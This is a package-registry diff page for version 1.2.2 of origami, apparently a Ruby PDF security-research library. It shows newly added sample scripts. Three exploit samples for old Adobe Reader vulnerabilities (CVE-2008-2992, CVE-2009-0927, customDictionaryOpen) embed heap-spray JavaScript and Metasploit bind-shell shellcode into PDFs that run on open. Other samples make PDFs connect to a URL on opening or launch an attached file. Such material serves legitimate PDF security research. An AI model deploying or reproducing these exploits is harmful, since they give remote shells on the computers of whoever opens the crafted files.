RubyGems - origami - Versions diffs - 1.2.1 → 1.2.2 - Mend

origami 1.2.1 → 1.2.2

Files changed (121) hide show

data/README +1 -1
data/bin/gui/hexview.rb +1 -1
data/bin/gui/menu.rb +4 -4
data/bin/gui/textview.rb +6 -4
data/bin/gui/treeview.rb +4 -4
data/bin/gui/walker.rb +1 -1
data/bin/pdf2graph +1 -1
data/bin/pdf2pdfa +1 -1
data/bin/pdf2ruby +1 -1
data/bin/pdfcocoon +1 -1
data/bin/pdfcop +1 -1
data/bin/pdfdecompress +1 -1
data/bin/pdfdecrypt +1 -1
data/bin/pdfencrypt +1 -1
data/bin/pdfextract +75 -14
data/bin/pdfmetadata +1 -1
data/bin/shell/.irbrc +1 -1
data/{origami.rb → lib/origami.rb} +3 -3
data/{origami → lib/origami}/3d.rb +0 -0
data/{origami → lib/origami}/acroform.rb +2 -2
data/{origami → lib/origami}/actions.rb +0 -0
data/{origami → lib/origami}/annotations.rb +0 -0
data/{origami → lib/origami}/array.rb +0 -0
data/{origami → lib/origami}/boolean.rb +0 -0
data/{origami → lib/origami}/catalog.rb +0 -0
data/{origami → lib/origami}/destinations.rb +0 -0
data/{origami → lib/origami}/dictionary.rb +0 -0
data/{origami → lib/origami}/docmdp.rb +0 -0
data/{origami → lib/origami}/encryption.rb +9 -7
data/{origami → lib/origami}/export.rb +0 -0
data/lib/origami/extensions/fdf.rb +257 -0
data/{origami/adobe → lib/origami/extensions}/ppklite.rb +3 -1
data/{origami → lib/origami}/file.rb +0 -0
data/{origami → lib/origami}/filters.rb +0 -0
data/{origami → lib/origami}/filters/ascii.rb +0 -0
data/{origami → lib/origami}/filters/ccitt.rb +0 -1
data/{origami → lib/origami}/filters/crypt.rb +0 -0
data/{origami → lib/origami}/filters/dct.rb +0 -0
data/{origami → lib/origami}/filters/flate.rb +0 -0
data/{origami → lib/origami}/filters/jbig2.rb +0 -0
data/{origami → lib/origami}/filters/jpx.rb +0 -0
data/{origami → lib/origami}/filters/lzw.rb +0 -0
data/{origami → lib/origami}/filters/predictors.rb +0 -0
data/{origami → lib/origami}/filters/runlength.rb +0 -0
data/{origami → lib/origami}/font.rb +0 -0
data/{origami → lib/origami}/functions.rb +0 -0
data/{origami → lib/origami}/graphics.rb +0 -0
data/{origami → lib/origami}/graphics/colors.rb +45 -23
data/{origami → lib/origami}/graphics/instruction.rb +0 -0
data/{origami → lib/origami}/graphics/path.rb +0 -0
data/{origami → lib/origami}/graphics/patterns.rb +0 -0
data/{origami → lib/origami}/graphics/render.rb +0 -0
data/{origami → lib/origami}/graphics/state.rb +2 -2
data/{origami → lib/origami}/graphics/text.rb +0 -0
data/{origami → lib/origami}/graphics/xobject.rb +219 -0
data/{origami → lib/origami}/header.rb +0 -0
data/{origami → lib/origami}/javascript.rb +0 -0
data/{origami → lib/origami}/linearization.rb +0 -0
data/{origami → lib/origami}/metadata.rb +0 -0
data/{origami → lib/origami}/name.rb +0 -0
data/{origami → lib/origami}/null.rb +0 -0
data/{origami → lib/origami}/numeric.rb +0 -0
data/{origami → lib/origami}/obfuscation.rb +0 -0
data/{origami → lib/origami}/object.rb +7 -2
data/{origami → lib/origami}/outline.rb +0 -0
data/{origami → lib/origami}/outputintents.rb +0 -0
data/{origami → lib/origami}/page.rb +0 -0
data/{origami → lib/origami}/parser.rb +76 -51
data/{origami → lib/origami}/parsers/fdf.rb +9 -6
data/{origami/parsers/pdf/linear.rb → lib/origami/parsers/pdf.rb} +31 -39
data/lib/origami/parsers/pdf/linear.rb +84 -0
data/lib/origami/parsers/ppklite.rb +93 -0
data/{origami → lib/origami}/pdf.rb +6 -3
data/{origami → lib/origami}/reference.rb +0 -0
data/{origami → lib/origami}/signature.rb +170 -19
data/{origami → lib/origami}/stream.rb +9 -0
data/{origami → lib/origami}/string.rb +0 -0
data/{origami → lib/origami}/trailer.rb +0 -0
data/{origami → lib/origami}/webcapture.rb +0 -0
data/{origami → lib/origami}/xfa.rb +0 -0
data/{origami → lib/origami}/xreftable.rb +3 -7
data/samples/README.txt +45 -0
data/samples/actions/launch/calc.rb +87 -0
data/samples/actions/launch/winparams.rb +22 -0
data/samples/actions/loop/loopgoto.rb +24 -0
data/samples/actions/loop/loopnamed.rb +21 -0
data/samples/actions/named/named.rb +31 -0
data/samples/actions/samba/smbrelay.rb +26 -0
data/samples/actions/triggerevents/trigger.rb +75 -0
data/samples/actions/webbug/submitform.js +26 -0
data/samples/actions/webbug/webbug-browser.rb +68 -0
data/samples/actions/webbug/webbug-js.rb +67 -0
data/samples/actions/webbug/webbug-reader.rb +90 -0
data/samples/attachments/attach.rb +40 -0
data/samples/attachments/attached.txt +1 -0
data/samples/crypto/crypto.rb +28 -0
data/samples/digsig/signed.rb +46 -0
data/samples/exploits/cve-2008-2992-utilprintf.rb +87 -0
data/samples/exploits/cve-2009-0927-geticon.rb +65 -0
data/samples/exploits/exploit_customdictopen.rb +55 -0
data/samples/exploits/getannots.rb +69 -0
data/samples/flash/flash.rb +31 -0
data/samples/flash/helloworld.swf +0 -0
data/samples/javascript/attached.txt +1 -0
data/samples/javascript/js.rb +52 -0
data/{tests → test}/ts_pdf.rb +1 -1
metadata +109 -95
data/origami/adobe/fdf.rb +0 -259
data/origami/parsers/pdf.rb +0 -27
data/origami/parsers/ppklite.rb +0 -86
data/tests/dataset/test.dummycrt +0 -28
data/tests/dataset/test.dummykey +0 -27
data/tests/tc_actions.rb +0 -32
data/tests/tc_annotations.rb +0 -85
data/tests/tc_pages.rb +0 -37
data/tests/tc_pdfattach.rb +0 -24
data/tests/tc_pdfencrypt.rb +0 -110
data/tests/tc_pdfnew.rb +0 -32
data/tests/tc_pdfparse.rb +0 -98
data/tests/tc_pdfsig.rb +0 -37
data/tests/tc_streams.rb +0 -129

data/samples/actions/webbug/webbug-js.rb ADDED Viewed

@@ -0,0 +1,67 @@
+#!/usr/bin/ruby
+begin
+  require 'origami'
+rescue LoadError
+  ORIGAMIDIR = "#{File.dirname(__FILE__)}/../../../lib"
+  $: << ORIGAMIDIR
+  require 'origami'
+end
+include Origami
+OUTPUTFILE = "webbug-js.pdf"
+JSCRIPTFILE = "submitform.js"
+puts "Now generating a new PDF file from scratch!"
+contents = ContentStream.new.setFilter(:FlateDecode)
+contents.write OUTPUTFILE,
+  :x => 300, :y => 750, :rendering => Text::Rendering::STROKE, :size => 30
+contents.write "This PDF tries to connect through JavaScript calls :-D",
+  :x => 186, :y => 690, :rendering => Text::Rendering::FILL, :size => 15
+contents.write "The script first tries to run your browser, then it connects with the Reader.",
+  :x => 186, :y => 670, :size => 15
+contents.write "Comments:",
+  :x => 75, :y => 620, :rendering => Text::Rendering::FILL_AND_STROKE, :size => 14
+content = <<-EOS
+Windows:
+  - Acrobat Reader 8: Same behavior as with webbug-browser.pdf and webbug-reader.pdf.
+  - Foxit: Same behavior as with webbug-browser.pdf and webbug-reader.pdf, at the difference a popup appears
+      to ask for user confirmation before launching the browser. However the reader still connects to the site without
+      confirmation, as with webbug-reader.pdf
+Mac:
+Linux:
+  - Acrobat Reader 8: same behavior as Windows version.
+  - poppler-based viewers: not interpreting JavaScript : nothing happens.
+EOS
+contents.write content,
+  :x => 75, :y => 600, :rendering => Text::Rendering::FILL
+# A JS script to execute at the opening of the document
+jscript = File.open(JSCRIPTFILE).read
+pdf = PDF.new
+page = Page.new
+page.Contents = contents
+pdf.append_page(page)
+# Create a new action based on the script, compressed with zlib
+jsaction = Action::JavaScript.new( Stream.new(jscript,:Filter => :FlateDecode) )
+# Add the script into the document names dictionary. Any scripts registered here will be executed at the document opening (with no OpenAction implied).
+pdf.register(Names::Root::JAVASCRIPT, "Update", jsaction)
+# Save the resulting file
+pdf.save(OUTPUTFILE)
+puts "PDF file saved as #{OUTPUTFILE}."

data/samples/actions/webbug/webbug-reader.rb ADDED Viewed

@@ -0,0 +1,90 @@
+#!/usr/bin/ruby
+begin
+  require 'origami'
+rescue LoadError
+  ORIGAMIDIR = "#{File.dirname(__FILE__)}/../../../lib"
+  $: << ORIGAMIDIR
+  require 'origami'
+end
+include Origami
+OUTPUTFILE = "webbug-reader.pdf"
+URL = "http://localhost/webbug-reader.php"
+puts "Now generating a new bugged PDF file from scratch!"
+pdf = PDF.new
+contents = ContentStream.new
+contents.write "webbug-reader.pdf",
+  :x => 270, :y => 750, :rendering => Text::Rendering::STROKE, :size => 30
+contents.write "When opened, this PDF connects to \"home\"",
+  :x => 156, :y => 690, :rendering => Text::Rendering::FILL, :size => 15
+contents.write "Click \"Allow\" to connect to #{URL} through your current Reader.",
+  :x => 156, :y => 670, :size => 12
+contents.write "Comments:",
+  :x => 75, :y => 600, :rendering => Text::Rendering::FILL_AND_STROKE, :size => 14
+content = <<-EOS
+1. Open this pdf document (webbug-reader.pdf)
+2. The Reader connects to ${url}
+3. The web server returns the requested page:
+      <?php
+        header('Content-type: application/pdf');
+        readfile('calc.pdf');
+      ?>
+4. The Reader receives \"calc.pdf\" which is immediatly rendered
+5. A pop-up ask if it can execute the calc...
+Note: The URL where the Reader tries to connect is displayed
+Windows:
+  - Foxit : Nothing happens.
+  - Acrobat Reader 8: a popup appears for the user to allow the connection,
+      then the connection is made and a new window is opened with the 2nd document
+Mac:
+  - Preview: nothing happens
+  - Acrobat Reader 8: a popup appears for the user to allow the connection,
+      then the connection is made and a new window is opened with the 2nd document
+Linux:
+  - poppler: /SubmitForm is not supported
+  - Acrobat Reader 8: a popup appears for the user to allow the connection,
+      then the connection is made and a the document window is replaced with the 2nd document
+      Note: The 2 documents can be seen in the\"Window\" menu.
+  - Acrobat Reader 8: a popup appears for the user to allow the connection,
+      then the connection is made and a new window is opened with the 2nd document
+EOS
+contents.write content,
+  :x => 75, :y => 580, :rendering => Text::Rendering::FILL, :size => 12
+page = Page.new.setContents( contents )
+pdf.append_page( page )
+# Submit flags.
+flags = Action::SubmitForm::Flags::EXPORTFORMAT|Action::SubmitForm::Flags::GETMETHOD
+# Sends the form at the document opening.
+pdf.onDocumentOpen Action::SubmitForm.new(URL, [], flags)
+# Comments:
+#  - any port can be specified http://url:1234
+#  - does not follow the Redirect answers
+# Save the resulting file.
+pdf.save(OUTPUTFILE)
+puts "PDF file saved as #{OUTPUTFILE}."

data/samples/attachments/attach.rb ADDED Viewed

@@ -0,0 +1,40 @@
+#!/usr/bin/env ruby
+begin
+  require 'origami'
+rescue LoadError
+  ORIGAMIDIR = "#{File.dirname(__FILE__)}/../../lib"
+  $: << ORIGAMIDIR
+  require 'origami'
+end
+include Origami
+INPUTFILE = "attached.txt"
+OUTPUTFILE = "#{File.basename(__FILE__, ".rb")}.pdf"
+puts "Now generating a new PDF file from scratch!"
+# Creating a new file
+pdf = PDF.new
+# Embedding the file into the PDF.
+pdf.attach_file(INPUTFILE,
+  :EmbeddedName => "README.txt",
+  :Filter => :ASCIIHexDecode
+)
+contents = ContentStream.new
+contents.write "File attachment sample",
+  :x => 250, :y => 750, :rendering => Text::Rendering::FILL, :size => 30
+pdf.append_page Page.new.setContents(contents)
+js = <<JS
+  this.exportDataObject({cName:"README.txt", nLaunch:2});
+JS
+pdf.onDocumentOpen Action::JavaScript.new(js)
+pdf.save(OUTPUTFILE)
+puts "PDF file saved as #{OUTPUTFILE}."

data/samples/attachments/attached.txt ADDED Viewed

	@@ -0,0 +1 @@
1	+ *THIS IS THE EMBEDDED FILE*

data/samples/crypto/crypto.rb ADDED Viewed

@@ -0,0 +1,28 @@
+#!/usr/bin/env ruby
+begin
+  require 'origami'
+rescue LoadError
+  ORIGAMIDIR = "#{File.dirname(__FILE__)}/../../lib"
+  $: << ORIGAMIDIR
+  require 'origami'
+end
+include Origami
+OUTPUTFILE = "#{File.basename(__FILE__, ".rb")}.pdf"
+puts "Now generating a new PDF file from scratch!"
+# Creates an encrypted document with AES256 and a null password.
+pdf = PDF.new.encrypt(:cipher => 'aes', :key_size => 256)
+contents = ContentStream.new
+contents.write "Crypto sample",
+  :x => 350, :y => 750, :rendering => Text::Rendering::STROKE, :size => 30
+pdf.append_page Page.new.setContents(contents)
+pdf.save(OUTPUTFILE)
+puts "PDF file saved as #{OUTPUTFILE}."

data/samples/digsig/signed.rb ADDED Viewed

@@ -0,0 +1,46 @@
+#!/usr/bin/ruby
+require 'openssl'
+begin
+  require 'origami'
+rescue LoadError
+  ORIGAMIDIR = "#{File.dirname(__FILE__)}/../../lib"
+  $: << ORIGAMIDIR
+  require 'origami'
+end
+include Origami
+OUTPUTFILE = "#{File.basename(__FILE__, ".rb")}.pdf"
+CERTFILE = "test.crt"
+RSAKEYFILE = "test.key"
+contents = ContentStream.new.setFilter(:FlateDecode)
+contents.write OUTPUTFILE,
+  :x => 350, :y => 750, :rendering => Text::Rendering::STROKE, :size => 30
+pdf = PDF.new
+page = Page.new.setContents(contents)
+pdf.append_page(page)
+# Open certificate files
+cert = OpenSSL::X509::Certificate.new(File.open(CERTFILE).read)
+key = OpenSSL::PKey::RSA.new(File.open(RSAKEYFILE).read)
+sigannot = Annotation::Widget::Signature.new
+sigannot.Rect = Rectangle[:llx => 89.0, :lly => 386.0, :urx => 190.0, :ury => 353.0]
+page.add_annot(sigannot)
+# Sign the PDF with the specified keys
+pdf.sign(cert, key,
+  :method => 'adbe.pkcs7.sha1',
+  :annotation => sigannot,
+  :location => "France",
+  :contact => "fred@security-labs.org",
+  :reason => "Proof of Concept"
+)
+# Save the resulting file
+pdf.save(OUTPUTFILE)

data/samples/exploits/cve-2008-2992-utilprintf.rb ADDED Viewed

@@ -0,0 +1,87 @@
+#!/usr/bin/env ruby
+begin
+  require 'origami'
+rescue LoadError
+  ORIGAMIDIR = "#{File.dirname(__FILE__)}/../../lib"
+  $: << ORIGAMIDIR
+  require 'origami'
+end
+include Origami
+pdf = PDF.read(ARGV[0])
+# win32_bind -  EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com
+win32_bin = "%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949%u4949%u4949%u4949%u4949%u4949%u4937%u5a51%u436a%u3058%u3142%u4150%u6b42%u4141%u4153%u4132%u3241%u4142%u4230%u5841%u3850%u4241%u7875%u4b69%u724c%u584a%u526b%u4a6d%u4a48%u6b59%u6b4f%u694f%u416f%u4e70%u526b%u744c%u4164%u6e34%u376b%u5535%u4c6c%u714b%u646c%u6145%u7468%u6a41%u6e4f%u626b%u326f%u6c38%u334b%u376f%u5550%u7851%u316b%u6c59%u504b%u6e34%u466b%u6861%u456e%u6f61%u6c30%u6c59%u6b6c%u3934%u4150%u3764%u6877%u6941%u565a%u636d%u4b31%u7872%u6c6b%u7534%u566b%u3134%u5734%u5458%u6b35%u6e55%u336b%u556f%u7474%u7841%u416b%u4c76%u464b%u626c%u6e6b%u416b%u354f%u564c%u6861%u666b%u3663%u6c4c%u6b4b%u7239%u444c%u5764%u616c%u4f71%u4733%u6b41%u336b%u4c54%u634b%u7073%u6c30%u534b%u6470%u6c4c%u724b%u4550%u4e4c%u6c4d%u374b%u7530%u7358%u426e%u4c48%u524e%u466e%u586e%u566c%u3930%u586f%u7156%u4676%u7233%u6346%u3058%u7033%u3332%u5458%u5237%u4553%u5162%u504f%u4b54%u5a4f%u3370%u6a58%u686b%u596d%u456c%u466b%u4930%u596f%u7346%u4e6f%u5869%u7365%u4d56%u5851%u366d%u6468%u7242%u7275%u674a%u5972%u6e6f%u7230%u4a48%u5679%u6b69%u6e45%u764d%u6b37%u584f%u3356%u3063%u5053%u7653%u7033%u3353%u5373%u3763%u5633%u6b33%u5a4f%u3270%u5046%u3568%u7141%u304c%u3366%u6c63%u6d49%u6a31%u7035%u6e68%u3544%u524a%u4b50%u7177%u4b47%u4e4f%u3036%u526a%u3130%u7041%u5955%u6e6f%u3030%u6c68%u4c64%u546d%u796e%u3179%u5947%u596f%u4646%u6633%u6b35%u584f%u6350%u4b58%u7355%u4c79%u4146%u6359%u4b67%u784f%u7656%u5330%u4164%u3344%u7965%u4e6f%u4e30%u7173%u5878%u6167%u6969%u7156%u6269%u3977%u6a6f%u5176%u4945%u4e6f%u5130%u5376%u715a%u7274%u6246%u3048%u3063%u6c6d%u5a49%u6345%u625a%u7670%u3139%u5839%u4e4c%u4d69%u5337%u335a%u4e74%u4b69%u5652%u4b51%u6c70%u6f33%u495a%u336e%u4472%u6b6d%u374e%u7632%u6e4c%u6c73%u704d%u767a%u6c58%u4e6b%u4c4b%u736b%u5358%u7942%u6d6e%u7463%u6b56%u304f%u7075%u4b44%u794f%u5346%u706b%u7057%u7152%u5041%u4251%u4171%u337a%u4231%u4171%u5141%u6645%u6931%u5a6f%u5070%u6e68%u5a4d%u5679%u6865%u334e%u3963%u586f%u6356%u4b5a%u4b4f%u704f%u4b37%u4a4f%u4c70%u614b%u6b47%u4d4c%u6b53%u3174%u4974%u596f%u7046%u5952%u4e6f%u6330%u6c58%u6f30%u577a%u6174%u324f%u4b73%u684f%u3956%u386f%u4350"
+# linux/x86/shell_bind_tcp - 105 bytes
+# http://www.metasploit.com
+# Encoder: x86/shikata_ga_nai
+# AppendExit=false, PrependSetresuid=false,
+# PrependSetuid=false, LPORT=4444, RHOST=,
+# PrependSetreuid=false
+linux_bin = "%u7dbf%uca55%u2ba7%udbc9%ub1d3%ud914%u2474%u5bf4%ueb83%u31fc%u0e7b%u7b03%u9f0e%ufba0%ua87c%uafa8%u05c1%u5245%u484f%u3429%u0a82%ue711%u624e%u1559%u2e7e%u0acf%u9ed1%uca86%u78bb%uc1c1%u0dbc%uddb0%u090f%ub883%u91a2%uf4a0%u5c5b%u66a6%u34fa%ud098%u4830%u99af%u2032%u751f%ud8b0%ua637%u7154%u31a6%ud17b%ucb65%u619d%u0682%u41dd"
+shellcode = linux_bin
+jscript = %Q|
+/*
+From: http://www.milw0rm.com/exploits/7006
+Adobe Reader Javascript Printf Buffer Overflow Exploit
+===========================================================
+Reference: http://www.coresecurity.com/content/adobe-reader-buffer-overflow
+CVE-2008-2992
+Thanks to coresecurity for the technical background.
+6Nov,2008: Exploit released by me
+Credits: Debasis Mohanty
+www.hackingspirits.com
+www.coffeeandsecurity.com
+===========================================================
+//Exploit by Debasis Mohanty (aka nopsledge/Tr0y)
+//www.coffeeandsecurity
+//www.hackingspirits.com
+*/
+    app.alert("Prepare the spray");
+    var shellcode = unescape("#{shellcode}");
+    //Heap Spray starts here - Kiddos dont mess up with this
+    var nop ="";
+    for (i = 128;i >= 0; --i) nop += unescape("%u9090%u9090%u9090%u9090%u9090");
+    heapblock = nop + shellcode;
+    bigblock = unescape("%u9090%u9090");
+    headersize = 20;
+    spray = headersize+heapblock.length
+    while (bigblock.length<spray) bigblock+=bigblock;
+    fillblock = bigblock.substring(0, spray);
+    block = bigblock.substring(0, bigblock.length-spray);
+    while(block.length+spray < 0x40000) block = block+block+fillblock;
+    mem = new Array();
+    for (i=0;i<1400;i++) mem[i] = block + heapblock;
+    app.alert("Pull the trigger");
+// reference snippet from core security
+// http://www.coresecurity.com/content/adobe-reader-buffer-overflow
+var num = 12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
+util.printf("%45000f",num);
+//    util.printf("%45000.45000f", 0);
+|
+exploit = Action::JavaScript.new(Stream.new(jscript))
+pdf.onDocumentOpen( exploit )
+pdf.save("#{File.basename($0, '.rb')}.pdf")

data/samples/exploits/cve-2009-0927-geticon.rb ADDED Viewed

@@ -0,0 +1,65 @@
+#!/usr/bin/env ruby
+#
+# References:
+#    CVE 2009-0927
+#    http://www.securityfocus.com/bid/34169
+#    http://www.zerodayinitiative.com/advisories/ZDI-09-014/
+#
+#�Vulnerable: Adobe Reader and Adobe Acrobat Professional < 8.1.4
+#
+# This exploit / PoC spawns a calc on Windows.
+#
+#
+begin
+  require 'origami'
+rescue LoadError
+  ORIGAMIDIR = "#{File.dirname(__FILE__)}/../../lib"
+  $: << ORIGAMIDIR
+  require 'origami'
+end
+include Origami
+pdf = PDF.read(ARGV[0])
+jscript = %Q|
+function spary() {
+var shellcode = unescape("%uc92b%u1fb1%u0cbd%uc536%udb9b%ud9c5%u2474%u5af4%uea83%u31fc%u0b6a%u6a03%ud407%u6730%u5cff%u98\
+bb%ud7ff%ua4fe%u9b74%uad05%u8b8b%u028d%ud893%ubccd%u35a2%u37b8%u4290%ua63a%u94e9%u9aa4%ud58d%ue5a3%u1f4c%ueb46%u4b8c%ud0\
+ad%ua844%u524a%u3b81%ub80d%ud748%u4bd4%u6c46%u1392%u734a%u204f%uf86e%udc8e%ua207%u26b4%u04d4%ud084%uecba%u9782%u217c%ue8\
+c0%uca8c%uf4a6%u4721%u0d2e%ua0b0%ucd2c%u00a8%ub05b%u43f4%u24e8%u7a9c%ubb85%u7dcb%ua07d%ued92%u09e1%u9631%u5580");
+//shellcode = unescape("%u7dbf%uca55%u2ba7%udbc9%ub1d3%ud914%u2474%u5bf4%ueb83%u31fc%u0e7b%u7b03%u9f0e%ufba0%ua87c%uafa8%u05c1%u5245%u484f%u3429%u0a82%ue711%u624e%u1559%u2e7e%u0acf%u9ed1%uca86%u78bb%uc1c1%u0dbc%uddb0%u090f%ub883%u91a2%uf4a0%u5c5b%u66a6%u34fa%ud098%u4830%u99af%u2032%u751f%ud8b0%ua637%u7154%u31a6%ud17b%ucb65%u619d%u0682%u41dd");
+garbage = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u90\
+90%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u90\
+90%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u90\
+90%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u90\
+90%u9090%u9090%u9090") + shellcode;
+nopblock = unescape("%u9090%u9090");
+headersize = 10;
+acl = headersize+garbage.length;
+while (nopblock.length<acl) nopblock+=nopblock;
+fillblock = nopblock.substring(0, acl);
+block = nopblock.substring(0, nopblock.length-acl);
+while(block.length+acl<0x40000) block = block+block+fillblock;
+memory = new Array();
+for (i=0;i<180;i++) memory[i] = block + garbage;
+var buffersize = 4012;
+var buffer = Array(buffersize);
+for (i=0; i<buffersize; i++)
+{
+buffer[i] = unescape("%0a%0a%0a%0a");
+}
+Collab.getIcon(buffer+'_N.bundle');
+}
+spary();
+|
+exploit = Action::JavaScript.new(Stream.new(jscript).setFilter([:FlateDecode, :ASCII85Decode, :RunLengthDecode]))
+pdf.pages.first.onOpen( exploit )
+pdf.save("#{File.basename($0, '.rb')}.pdf")

data/samples/exploits/exploit_customdictopen.rb ADDED Viewed

@@ -0,0 +1,55 @@
+#!/usr/bin/env ruby
+begin
+  require 'origami'
+rescue LoadError
+  ORIGAMIDIR = "#{File.dirname(__FILE__)}/../../lib"
+  $: << ORIGAMIDIR
+  require 'origami'
+end
+include Origami
+pdf = PDF.read(ARGV[0])
+jscript = %Q|
+//##############
+//Exploit made by Arr1val
+//Proved in adobe 9.1 and adobe 8.1.4 on linux
+//##############
+app.alert('start heap spray...');
+var memory;
+var nop = unescape("%u9090%u9090");
+var shellcode = unescape( "%uc92b%ue983%ud9eb%ud9ee%u2474%u5bf4%u7381%u1313%u2989%u8357%ufceb%uf4e2%u5222%u147a%ue340%u3d2b%ud175%udeb0%u44f2%uc1a9%udb50%u3f4f%ud502%u044f%u689a%u3143%ud94b%u0178%u689a%ud7e4%uefa3%ub4f8%u09de%u057b%uca45%ub6a0%uefa3%ud7e4%ue380%u0e2b%ub6a3%ud7e4%uf05a%ue7d0%udb18%u7841%ufa3c%u3f41%ueb3c%u3940%u6a9a%u047b%u689a%ud7e4"); //linux bind shell at port 4444
+while(nop.length <= 0x10000/2) {
+    nop += nop;
+}
+nop = nop.substring(0,0x10000/2 - shellcode.length);
+memory = new Array();
+for (i=0; i<0x6ff0; i++) {
+    memory[i] = nop + shellcode;
+}
+//start exploit now
+start();
+function start()
+{
+	this.spell.customDictionaryOpen(0,nop);//so the exploit jumps actually to 0x90909090. Place a very long 'AAAA' at the second param to go to 0x41414141
+}
+//############################
+//# milw0rm.com [2009-04-29]
+|
+#exploit = Action::JavaScript.new(Stream.new(jscript).setFilter([:FlateDecode, :ASCII85Decode, :RunLengthDecode]))
+exploit = Action::JavaScript.new(Stream.new(jscript))
+pdf.onDocumentOpen( exploit )
+pdf.save("#{File.basename($0, '.rb')}.pdf")